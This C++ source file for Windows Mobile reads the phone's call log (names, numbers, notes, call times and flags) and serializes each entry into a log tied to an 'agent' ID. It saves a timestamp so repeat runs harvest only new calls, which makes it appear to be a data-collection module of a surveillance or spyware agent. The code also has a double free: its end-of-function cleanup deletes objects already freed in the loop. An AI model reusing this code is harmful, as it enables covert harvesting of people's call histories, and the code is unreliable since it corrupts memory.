#include <windows.h>
#include <phone.h>

#include "CallList.h"
#include "CallListSerializer.h"

#include "Log.h"

CallList::CallList() : _hCallList(NULL)
{	
}

BOOL CallList::_InitCallList()
{
	BOOL bRet = FALSE; 
	if(SUCCEEDED(PhoneOpenCallLog(&_hCallList)))
		bRet = TRUE; 

	return bRet;
}

void CallList::_UnInitCallList()
{
	PhoneCloseCallLog(&_hCallList);
}

void CallList::Run(UINT uAgentId)
{
	UINT uCount = 0;

	if(_InitCallList())
		uCount = _GetCallList(uAgentId);

	_UnInitCallList();
}

UINT CallList::_GetCallList(UINT uAgentId)
{
	HRESULT hr;

	CallStruct *pTmpCallStruct;

	CALLLOGENTRY  *pTmpCALLLOGENTRY;
	BYTE *pBuf;
	BOOL bLogCreated = FALSE;

	FILETIME	ft;
	SYSTEMTIME	st;
	ZeroMemory(&ft, sizeof(FILETIME));
	ZeroMemory(&st, sizeof(SYSTEMTIME));

	Log *pCallListLog = new Log();
	
	UINT uCount = 0, uRecord = 0, uIndex = 0, uLen = 0;

	if(FAILED(PhoneSeekCallLog(_hCallList, CALLLOGSEEK_END, 0, (DWORD*) &uRecord))){
		pCallListLog->CloseLog();
		delete pCallListLog;
		return 0;
	}
	if(FAILED(PhoneSeekCallLog(_hCallList, CALLLOGSEEK_BEGINNING, 0, NULL))){
		pCallListLog->CloseLog();
		delete pCallListLog;
		return 0;
	}

	// Set index start position 
	Log *pCallListMarkup = new Log();
	if(pCallListMarkup->IsMarkup(uAgentId)){
		BYTE * pDataMarkup; 
		UINT len = sizeof(FILETIME);
		
		pDataMarkup = pCallListMarkup->ReadMarkup(uAgentId, &len);
		if(pDataMarkup)
			CopyMemory(&ft, pDataMarkup, sizeof(FILETIME));
		delete pDataMarkup;
	}

	CallListSerializer * serializer = new CallListSerializer();

	while(uIndex <= uRecord){
		
		pTmpCALLLOGENTRY = new CALLLOGENTRY();
		ZeroMemory(pTmpCALLLOGENTRY, sizeof(CALLLOGENTRY));
		
		pTmpCallStruct = new CallStruct;
		ZeroMemory(pTmpCallStruct, sizeof(CallStruct));
		
		// fill CALLLOGENTRY struct
		pTmpCALLLOGENTRY->cbSize = sizeof(CALLLOGENTRY);

		hr = PhoneGetCallLogEntry(_hCallList, pTmpCALLLOGENTRY);

		if(SUCCEEDED(hr)){
			uIndex++;
		
			if(_FillCallEntryStruct(pTmpCALLLOGENTRY, pTmpCallStruct, &uLen, &ft)){
				pBuf = new BYTE[uLen];
				ZeroMemory(pBuf, uLen);

				serializer->Serialize(pTmpCallStruct, pBuf);

				if(!bLogCreated){
					if(pCallListLog->CreateLog(LOGTYPE_CALLLIST, NULL, 0)){
						bLogCreated = TRUE;
					}else{
						if(pTmpCallStruct->pszName)		
							delete [] pTmpCallStruct->pszName;
						if(pTmpCallStruct->pszNameType)	
							delete [] pTmpCallStruct->pszNameType;
						if(pTmpCallStruct->pszNote)		
							delete [] pTmpCallStruct->pszNote;
						if(pTmpCallStruct->pszNumber)
							delete [] pTmpCallStruct->pszNumber;

						if(pTmpCALLLOGENTRY->pszName)	
							delete [] pTmpCALLLOGENTRY->pszName;
						if(pTmpCALLLOGENTRY->pszNameType)	
							delete [] pTmpCALLLOGENTRY->pszNameType;
						if(pTmpCALLLOGENTRY->pszNote)	
							delete [] pTmpCALLLOGENTRY->pszNote;
						if(pTmpCALLLOGENTRY->pszNumber)	
							delete [] pTmpCALLLOGENTRY->pszNumber;

						if(pTmpCALLLOGENTRY) delete pTmpCALLLOGENTRY;
						if(pTmpCallStruct) delete pTmpCallStruct;
						break;
					}
				}

				pCallListLog->WriteLog(pBuf, uLen);
				
				delete [] pBuf;
				uCount++;
			}
		}

		if(pTmpCallStruct->pszName)		
			delete [] pTmpCallStruct->pszName;
		if(pTmpCallStruct->pszNameType)	
			delete [] pTmpCallStruct->pszNameType;
		if(pTmpCallStruct->pszNote)		
			delete [] pTmpCallStruct->pszNote;
		if(pTmpCallStruct->pszNumber)
			delete [] pTmpCallStruct->pszNumber;

		if(pTmpCALLLOGENTRY->pszName)	
			delete [] pTmpCALLLOGENTRY->pszName;
		if(pTmpCALLLOGENTRY->pszNameType)	
			delete [] pTmpCALLLOGENTRY->pszNameType;
		if(pTmpCALLLOGENTRY->pszNote)	
			delete [] pTmpCALLLOGENTRY->pszNote;
		if(pTmpCALLLOGENTRY->pszNumber)	
			delete [] pTmpCALLLOGENTRY->pszNumber;

		if(pTmpCALLLOGENTRY) delete pTmpCALLLOGENTRY;
		if(pTmpCallStruct) delete pTmpCallStruct;
	}
	
	GetSystemTime(&st);
	SystemTimeToFileTime(&st, &ft);
	
	pCallListMarkup->WriteMarkup(uAgentId,(BYTE *)&ft, sizeof(FILETIME));
	pCallListMarkup->CloseLog();
	if(pCallListMarkup) delete pCallListMarkup;
	
	pCallListLog->CloseLog();
	if(pCallListLog) delete pCallListLog;
	
	if(pTmpCallStruct)	delete pTmpCallStruct;
	if(pTmpCALLLOGENTRY)	delete pTmpCALLLOGENTRY;

	if(serializer)	delete serializer;

	return uCount;
}

/**
 * Fill CallStruct struct
 */
BOOL CallList::_FillCallEntryStruct( CALLLOGENTRY *TmpCALLLOGENTRY, pCallStruct pTmpCallStruct, UINT *uLen, FILETIME *ft)
{
	if(ft->dwHighDateTime != 0 || ft->dwLowDateTime != 0){

		ULARGE_INTEGER time1;
		ULARGE_INTEGER time2;
		time1.HighPart = ft->dwHighDateTime;
		time1.LowPart  = ft->dwLowDateTime;
	
		time2.HighPart = TmpCALLLOGENTRY->ftStartTime.dwHighDateTime;
		time2.LowPart  = TmpCALLLOGENTRY->ftStartTime.dwLowDateTime;

		if( time1.QuadPart > time2.QuadPart)
			return FALSE;
	}

	pTmpCallStruct->ftStartTime = TmpCALLLOGENTRY->ftStartTime; 
	pTmpCallStruct->ftEndTime	= TmpCALLLOGENTRY->ftEndTime;

	pTmpCallStruct->dwProperties = 0;

	if(TmpCALLLOGENTRY->fOutgoing)	pTmpCallStruct->dwProperties |= 0x01;	// direction of call.  (Missed calls are incoming.)
	if(TmpCALLLOGENTRY->fConnected)	pTmpCallStruct->dwProperties |= 0x02;	// Did the call connect? (as opposed to busy, no answer)
	if(TmpCALLLOGENTRY->fEnded)		pTmpCallStruct->dwProperties |= 0x04;	// Was the call ended? (as opposed to dropped)
	if(TmpCALLLOGENTRY->fRoam)		pTmpCallStruct->dwProperties |= 0x08;	// Roaming (vs. local)

	*uLen = CALLLIST_HEADER_LEN;
	
	size_t len = 0;

#define GETSTRING(x, y)													\
	if(TmpCALLLOGENTRY->x){												\
		len = wcslen(TmpCALLLOGENTRY->x);								\
		if(len){														\
			pTmpCallStruct->y = (UINT) sizeof(TCHAR) * len;				\
			pTmpCallStruct->x = new TCHAR[len + 1];						\
			wcscpy_s(pTmpCallStruct->x, len + 1, TmpCALLLOGENTRY->x);	\
			*uLen += sizeof(DWORD);										\
			*uLen += pTmpCallStruct->y;									\
		}else{															\
			pTmpCallStruct->y = 0;										\
		}																\
	}else{																\
		pTmpCallStruct->y = 0;											\
	}
	
	GETSTRING(pszName, uNameSize);
	GETSTRING(pszNameType, uNameTypeSize);
	GETSTRING(pszNote, uNoteSize);
	GETSTRING(pszNumber, uNumberSize);

	pTmpCallStruct->cbSize = *uLen;

	return TRUE;
}
